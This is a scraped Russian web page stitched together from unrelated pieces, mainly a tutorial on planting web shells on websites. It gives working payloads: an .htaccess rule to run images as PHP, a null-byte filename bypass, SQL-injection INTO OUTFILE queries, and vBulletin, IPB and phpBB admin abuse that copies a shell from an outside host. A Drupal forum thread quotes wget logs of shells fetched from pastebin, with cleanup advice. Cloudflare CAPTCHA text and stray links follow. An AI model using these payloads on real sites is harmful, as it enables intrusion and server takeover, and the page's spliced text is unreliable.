Как залить шелл на сайт

Как залить шелл на сайт

Привет %username% и его друзья. Ну вот нужно срочно залить шелл на сайт, ну мало ли, может конечный гонорар от этого зависит. Ну а никак не получается. Вот собрал пару примеров (спасибо tracy и другим за это).

Льем шелл через картинку

Вы взломали сайт (разумеется только тестируете) с самописной админкой… И не можете залит веб-шелл, но там присутствует заливка картинок и загружает только форматы .jpg, .gif, .png.
Что в этом случаем можно сделать?

Пихаем шелл с расширением .gif в какую нибудь папку с картинками, и создаем файл .htaccess с содержимым

AddType application/x-httpd-php .gif
Данная команда выполнит формат .gif как php
Пробуем открыть [path]/shell.gif

Так же, если скрипт не равнодушен к переносу строки, пробуем залить шелл попутно переименовав его в shell.php%00.jpg, проверять доступность shell.php, а вдруг?

Способ заливки шелла через mysql.user из скули

1)Узнаем из под кого мы сидим и узнаем так же его права к mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+—+
(Узнаем под кем мы сидим)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=’наш юзер‘+—+
(Проверим привилегии нашего юзера. Если выдаёт ошибку при выводе, можно похексить нашего юзера 0x)
3) site.com/index.php?id=-1+union+select+1,»,3+from+mysql.user+into+outfile+’Путь до файла‘+—+
(Заливаем мини-шелл)
P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так:

site.com/index.php?id=1+and+1=0+union+Select+1,’prava‘,3+from+mysql.user+—+
Если prava отобразится, то права есть.

Следующая ситуация. Мы в админке форумного движка vBulletin

Заходим:
Plugins & Products -> Plugin Manager -> [Add New Plugin] Плагины & Продукты -> Менеджер плагинов -> [Добавить новый плагин]

Выбираем темптлей. Обычно выбирают faq_complete, выбираем и жмем галочку Plugin is Active выставляем «Yes» и сохраняем.

Читайте также:  Драйвера для samsung np355v5c windows 7

Далее выводим phpinfo()

Если мы вывели phpinfo() то считайте шелл у нас в руках.

Далее в phpinfo нужно найти полный путь до форума (например /home/u0000/site.ru/www/sell.php). Далее нам нужно наш веб-шелл превратить в txt файл и залить на любой сайт
mysite.com/shell.txt
Шелл заливаем командой

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что делает эта команда? Она копирует содержимое переменной [a] в переменную [b], то есть shell.txt копирует в shell.php

Заливаем шелл в IPB 3

Заходим:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

Код:
select 0x3c3f706870696e666f28293b3f3e into outfile ‘Z:/home/site.ru/www/uploads/shell.php’
Полный путь можно посмотреть так:

Админка->Поддержка
Там будет сверху написана версия PHP и слева ссылка на PHPINFO

Шелл тут:
http://site.com/uploads/shell.php

Заливаем шелл в phpBB 2

1. Создаём файл ex.sql
2. Прописываем туда

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e’, user_sig=’phpbb:eval(stripslashes($_GET[e]));’ WHERE user_id=2;
Где user_id=2 — идентификатор администратора

3. Заходим в админ-панель
4. В админ-панеле выбираем пункт «Восстановить БД» и загружаем ex.sql
5. Выполняем код / Заливаем шелл так

Заходим:
http://target/profile.php?mode=editprofile&e=phpinfo();
После:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что бы вывести phpinfo() нужно быть авторизованным.

Это только коротенький список, как и на какие движки можно залить шелл. Нужно больше? Welcome к ребятам на rdot
заливка на форумы
заливка на cms
А вот и мой любимый шелл, тоже на rdot))
WSO

Ядро 7.51 было
(сейчас обновился до 7.58, поможет ли это обновление?)

—2018-04-21 05:56:31— https://pastebin.com/raw/EU5eF9Lx
Resolving pastebin.com. 104.20.209.21, 104.20.208.21
Connecting to pastebin.com|104.20.209.21|:443. connected.
HTTP request sent, awaiting response. 200 OK
Length: unspecified [text/plain]
Saving to: `RxR__yuwshxvmkota.php’

2018-04-21 05:56:31 (51.3 MB/s) — `RxR__yuwshxvmkota.php’ saved [751]

—2018-04-21 05:56:32— https://pastebin.com/raw/3s8gLhBu
Resolving pastebin.com. 104.20.209.21, 104.20.208.21
Connecting to pastebin.com|104.20.209.21|:443. connected.
HTTP request sent, awaiting response. 200 OK
Length: unspecified [text/plain]
Saving to: `yE.php’

Читайте также:  Как включить защиту диска windows 10

2018-04-21 05:56:32 (37.4 MB/s) — `yE.php’ saved [8000]

Как можно защититься от этого?
По тому что оставляют, это группа RxR с Йемен. (сайт школьный)

  • Drupal7
  • Есть вопрос
  • Безопасность
  • Блог
  • Войдите или зарегистрируйтесь, чтобы отправлять комментарии

Комментарии

Грохнуть все файлы. Залить чистые. Потом пройтись утилиткой ai-bolit.

Кроме того посмотреть пользователей и сбросить права. Посмотреть базу на предмет пхп-кода.

Гляньте недавние темы:

Один из вариантов очистки уже зараженного сайта такой:

  1. Снимаем бекап
  2. Подключаем сайт к сервису https://virusdie.ru(инструкция есть на сайте — там все просто)
  3. Запускаем сканирование и получаем список модифицированных файлов с "закладками"
  4. Вычищаем закладки и удаляем "левые" файлы и созданные каталоги(при их наличии) — их легко увидеть в отчете о сканировании
  5. Пробуем запустить drush up drupal
  6. Если drush up не срабатывает — заливаем вручную новое ядро на хостинг и запускаем update.php
  7. Закачиваем в корень сайта robots.txt и .htaccess из бекапа и на всякий случай проверяем их содержимое
  8. Повторно прогоняем сканирование дабы убедиться что опасность миновала
  9. Удаляем с хостинга файлы от virusdie
  10. Готово
  • Войдите или зарегистрируйтесь, чтобы отправлять комментарии

Плохой вариант. Потому что:
— бывают ложноположительные срабатывания
— бывает что несрабатывает

Любые антивирусные утилиты это лишь ДОПОЛНИТЕЛЬНОЕ средство.

  • Войдите или зарегистрируйтесь, чтобы отправлять комментарии

Ну это само собой, не панацея — после заливки шелла в принципе гарантировать ничего нельзя, надо очень внимательно все проверять. В идеале, конечно, восстановиться из бекапа, снятого до инцидента или откатиться через git, если есть возможность и обновить ядро. Описаный выше вариант скорее для случаев когда надо оперативно сайт вернуть в рабочее состояние.

Please complete the security check to access youhack.ru

Why do I have to complete a CAPTCHA?

Completing the CAPTCHA proves you are a human and gives you temporary access to the web property.

Читайте также:  Долгое выключение windows 7

What can I do to prevent this in the future?

If you are on a personal connection, like at home, you can run an anti-virus scan on your device to make sure it is not infected with malware.

If you are at an office or shared network, you can ask the network administrator to run a scan across the network looking for misconfigured or infected devices.

Another way to prevent getting this page in the future is to use Privacy Pass. You may need to download version 2.0 now from the Chrome Web Store.

Cloudflare Ray ID: 57ebf0500aa3d477 • Your IP : 5.45.65.94 • Performance & security by Cloudflare

Ссылка на основную публикацию
Как вытащить батарейку cmos
Сброс времени и даты при каждом включении персонального компьютера – первый признак того, что элемент питания БИОС разрядился и требует...
Как восстановить вацап в телефоне самсунг
Инструкция, как восстановить ватсап на телефоне после удаления приложения? Иногда пользователи мобильных гаджетов удаляют установленные программы. Причиной этого может быть...
Как восстановить видео на телефоне после удаления
Иногда возникают ситуации, когда из-за своей невнимательности или системного сбоя с мобильного устройства удаляются важные для пользователя файлы. И если...
Как вытащить видео из инстаграмма
Привет уважаемые читатели seoslim.ru! В виду того, что социальная сеть Инстаграм стремительно развивается и позволяет размещать там не только фото...
Adblock detector